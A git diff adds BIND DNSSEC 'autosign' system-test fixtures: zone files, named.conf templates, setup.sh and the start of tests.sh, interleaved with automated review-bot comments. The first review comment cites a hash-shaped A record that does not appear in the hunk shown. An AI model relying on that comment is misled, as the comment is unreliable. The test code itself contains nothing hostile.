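Review bot: The final record of nsec3.example.db.in, `02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17`, has no comment explaining its owner name. The label is 32 characters drawn from the base32hex alphabet, which is the shape of an NSEC3 hashed owner name, so it presumably exists to check that the signer copes with an ordinary name that looks like (or collides with) an NSEC3 owner; that is inferred from the label alone, since the test that depends on it is not visible in this hunk. A comment line above it, for example `; ordinary A record whose owner is shaped like an NSEC3 hash label - keep`, would stop it from being removed later as stray data.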
@@ -0,0 +1,35 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
diff --git a/bin/tests/system/autosign/ns3/nsec3.optout.example.db.in b/bin/tests/system/autosign/ns3/nsec3.optout.example.db.in
new file mode 100644
index 0000000..15fe621
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/nsec3.optout.example.db.in
@@ -0,0 +1,35 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
diff --git a/bin/tests/system/autosign/ns3/oldsigs.example.db.in b/bin/tests/system/autosign/ns3/oldsigs.example.db.in
new file mode 100644
index 0000000..0b11a00
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/oldsigs.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/optout.example.db.in b/bin/tests/system/autosign/ns3/optout.example.db.in
new file mode 100644
index 0000000..fbb05af
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/optout.example.db.in
@@ -0,0 +1,38 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a A 10.0.0.3
+insecure NS ns.insecure
+ns.insecure A 10.53.0.3
+secure NS ns.secure
+ns.secure A 10.53.0.3
+nsec3 NS ns.nsec3
+ns.nsec3 A 10.53.0.3
+optout NS ns.optout
+ns.optout A 10.53.0.3
+child NS ns2.example.
+insecure.empty NS ns.insecure.empty
+ns.insecure.empty A 10.53.0.3
diff --git a/bin/tests/system/autosign/ns3/optout.nsec3.example.db.in b/bin/tests/system/autosign/ns3/optout.nsec3.example.db.in
new file mode 100644
index 0000000..15fe621
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/optout.nsec3.example.db.in
@@ -0,0 +1,35 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
diff --git a/bin/tests/system/autosign/ns3/optout.optout.example.db.in b/bin/tests/system/autosign/ns3/optout.optout.example.db.in
new file mode 100644
index 0000000..15fe621
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/optout.optout.example.db.in
@@ -0,0 +1,35 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
diff --git a/bin/tests/system/autosign/ns3/rsasha256.example.db.in b/bin/tests/system/autosign/ns3/rsasha256.example.db.in
new file mode 100644
index 0000000..f6c4fab
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/rsasha256.example.db.in
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/rsasha512.example.db.in b/bin/tests/system/autosign/ns3/rsasha512.example.db.in
new file mode 100644
index 0000000..f6c4fab
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/rsasha512.example.db.in
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/secure-to-insecure.example.db.in b/bin/tests/system/autosign/ns3/secure-to-insecure.example.db.in
new file mode 100644
index 0000000..14971bd
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/secure-to-insecure.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
diff --git a/bin/tests/system/autosign/ns3/secure-to-insecure2.example.db.in b/bin/tests/system/autosign/ns3/secure-to-insecure2.example.db.in
new file mode 100644
index 0000000..14971bd
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/secure-to-insecure2.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
diff --git a/bin/tests/system/autosign/ns3/secure.example.db.in b/bin/tests/system/autosign/ns3/secure.example.db.in
new file mode 100644
index 0000000..9855ec0
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/secure.example.db.in
@@ -0,0 +1,37 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
+dname-and-txt DNAME @
+ TXT "DNAME and TXT"
diff --git a/bin/tests/system/autosign/ns3/secure.nsec3.example.db.in b/bin/tests/system/autosign/ns3/secure.nsec3.example.db.in
new file mode 100644
index 0000000..15fe621
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/secure.nsec3.example.db.in
@@ -0,0 +1,35 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
diff --git a/bin/tests/system/autosign/ns3/secure.optout.example.db.in b/bin/tests/system/autosign/ns3/secure.optout.example.db.in
new file mode 100644
index 0000000..15fe621
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/secure.optout.example.db.in
@@ -0,0 +1,35 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
+
diff --git a/bin/tests/system/autosign/ns3/sync.example.db.in b/bin/tests/system/autosign/ns3/sync.example.db.in
new file mode 100644
index 0000000..c6c7f88
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/sync.example.db.in
@@ -0,0 +1,34 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
diff --git a/bin/tests/system/autosign/ns3/ttl1.example.db.in b/bin/tests/system/autosign/ns3/ttl1.example.db.in
new file mode 100644
index 0000000..0b11a00
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/ttl1.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/ttl2.example.db.in b/bin/tests/system/autosign/ns3/ttl2.example.db.in
new file mode 100644
index 0000000..0b11a00
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/ttl2.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/ttl3.example.db.in b/bin/tests/system/autosign/ns3/ttl3.example.db.in
new file mode 100644
index 0000000..0b11a00
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/ttl3.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/ttl4.example.db.in b/bin/tests/system/autosign/ns3/ttl4.example.db.in
new file mode 100644
index 0000000..0b11a00
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/ttl4.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns4/named.conf.in b/bin/tests/system/autosign/ns4/named.conf.in
new file mode 100644
index 0000000..b46ce91
--- /dev/null
+++ b/bin/tests/system/autosign/ns4/named.conf.in
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS4
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ dnssec-must-be-secure mustbesecure.example yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+include "trusted.conf";
+include "private.conf";
diff --git a/bin/tests/system/autosign/ns5/named.conf.in b/bin/tests/system/autosign/ns5/named.conf.in
new file mode 100644
index 0000000..710dfa8
--- /dev/null
+++ b/bin/tests/system/autosign/ns5/named.conf.in
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS5
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+include "trusted.conf";
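Review bot: The `// NS4` header in ns4/named.conf.in does not say what role this server plays, and the same holds for `// NS5` in the ns5/named.conf.in hunk that follows. Both files set `recursion yes;` and `dnssec-validation yes;` and take their trust anchors from an included `trusted.conf` that is not part of these hunks, so the file alone does not show where the anchors come from. It also does not explain why only ns4 adds `dnssec-must-be-secure mustbesecure.example yes;` and `include "private.conf";`. I would expand the comment to something like `// NS4: validating resolver; trust anchors come from trusted.conf and private.conf (presumably written during setup)` and give ns5 a matching line that states how it differs from ns4.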
diff --git a/bin/tests/system/autosign/setup.sh b/bin/tests/system/autosign/setup.sh
new file mode 100644
index 0000000..82faf02
--- /dev/null
+++ b/bin/tests/system/autosign/setup.sh
@@ -0,0 +1,24 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+
+echo_i "generating keys and preparing zones"
+cd ns1 && $SHELL keygen.sh
diff --git a/bin/tests/system/autosign/tests.sh b/bin/tests/system/autosign/tests.sh
new file mode 100755
index 0000000..ac96507
--- /dev/null
+++ b/bin/tests/system/autosign/tests.sh
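Review bot: The `-e` on the `#!/bin/sh -e` line of setup.sh only takes effect when the script is executed directly. The file is added with mode 100644 and the script itself starts its sibling as `$SHELL keygen.sh`, so setup.sh is presumably started the same way and then runs without errexit. In that case a failing `copy_setports` is ignored and the servers can come up with a missing or stale named.conf, which makes later test failures hard to trace back to setup. Put `set -e` on its own line after the license header, before `SYSTEMTESTTOP=..`, so the behaviour does not depend on how the script is invoked. If conf.sh turns out not to be errexit-clean, place it directly after the `. $SYSTEMTESTTOP/conf.sh` line instead.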
@@ -0,0 +1,1788 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +# convert private-type records to readable form +showprivate () { + echo "-- $@ --" + $DIG $DIGOPTS +nodnssec +short @$2 -t type65534 $1 | cut -f3 -d' ' | + while read record; do + $PERL -e 'my $rdata = pack("H*", @ARGV[0]); + die "invalid record" unless length($rdata) == 5; + my ($alg, $key, $remove, $complete) = unpack("CnCC", $rdata); + my $action = "signing"; + $action = "removing" if $remove; + my $state = " (incomplete)"; + $state = " (complete)" if $complete; + print ("$action: alg: $alg, key: $key$state\n");' $record + done +} + +# check that signing records are marked as complete +checkprivate () { + _ret=0 + expected="${3:-0}" + x=$(showprivate "$@") + echo $x | grep incomplete > /dev/null && _ret=1 + + if [ $_ret = $expected ]; then + return 0 + fi + + echo "$x" + echo_i "failed" + return 1 +} + +# wait until notifies for zone $1 are sent by server $2. This is an indication +# that the zone is signed with the active keys, and the changes have been +# committed. +wait_for_notifies () { + wait_for_log 10 "zone ${1}/IN: sending notifies" "${2}/named.run" || return 1 +} + +freq() { + _file=$1 + # remove first and last line that has incomplete set and skews the distribution + awk '$4 == "RRSIG" {print substr($9,1,8)}' < "$_file" | sort | uniq -c | sed '1d;$d' +} +# Check the signatures expiration times. 
First check how many signatures +# there are in total ($rrsigs). Then see what the distribution of signature +# expiration times is ($expiretimes). Ignore the time part for a better +# modelled distribution. +checkjitter () { + _file=$1 + _ret=0 + + if ! command -v bc >/dev/null 2>&1; then + echo_i "skip: bc not available" + return 0 + fi + + freq "$_file" | cat_i + _expiretimes=$(freq "$_file" | awk '{print $1}') + + _count=0 + # Check if we have at least 4 days + # This number has been tuned for `sig-validity-interval 10 2`, as + # 1 signature expiration dates should be spread out across at most 8 (10-2) days + # 2. we remove first and last day to remove frequency outlier, we are left with 6 (8-2) days + # 3. we subtract two more days to allow test pass on day boundaries, etc. leaving us with 4 (6-2) + for _num in $_expiretimes + do + _count=$((_count+1)) + done + if [ "$_count" -lt 4 ]; then + echo_i "error: not enough categories" + return 1 + fi + + # Calculate mean + _total=0 + for _num in $_expiretimes + do + _total=$((_total+_num)) + done + _mean=$(($_total / $_count)) + + # Calculate stddev + _stddev=0 + for _num in $_expiretimes + do + _stddev=$(echo "$_stddev + (($_num - $_mean) * ($_num - $_mean))" | bc) + done + _stddev=$(echo "sqrt($_stddev/$_count)" | bc) + + # We expect the number of signatures not to exceed the mean +- 3 * stddev. + _limit=$((_stddev*3)) + _low=$((_mean-_limit)) + _high=$((_mean+_limit)) + # Find outliers. + echo_i "checking whether all frequencies fall into <$_low;$_high> range" + for _num in $_expiretimes + do + if [ $_num -gt $_high ]; then + echo_i "error: too many RRSIG records ($_num) in expiration bucket" + _ret=1 + fi + if [ $_num -lt $_low ]; then + echo_i "error: too few RRSIG records ($_num) in expiration bucket" + _ret=1 + fi + done + + return $_ret +} + +# +# The NSEC record at the apex of the zone and its RRSIG records are +# added as part of the last step in signing a zone. 
We wait for the +# NSEC records to appear before proceeding with a counter to prevent +# infinite loops if there is a error. +# +echo_i "waiting for autosign changes to take effect" +i=0 +while [ $i -lt 30 ] +do + ret=0 + # + # Wait for the root DNSKEY RRset to be fully signed. + # + $DIG $DIGOPTS . @10.53.0.1 dnskey > dig.out.ns1.test$n || ret=1 + grep "ANSWER: 10," dig.out.ns1.test$n > /dev/null || ret=1 + for z in . + do + $DIG $DIGOPTS $z @10.53.0.1 nsec > dig.out.ns1.test$n || ret=1 + grep "NS SOA" dig.out.ns1.test$n > /dev/null || ret=1 + done + for z in bar. example. private.secure.example. optout-with-ent. + do + $DIG $DIGOPTS $z @10.53.0.2 nsec > dig.out.ns2.test$n || ret=1 + grep "NS SOA" dig.out.ns2.test$n > /dev/null || ret=1 + done + for z in bar. example. inacksk2.example. inacksk3.example \ + inaczsk2.example. inaczsk3.example noksk.example nozsk.example + do + $DIG $DIGOPTS $z @10.53.0.3 nsec > dig.out.ns3.test$n || ret=1 + grep "NS SOA" dig.out.ns3.test$n > /dev/null || ret=1 + 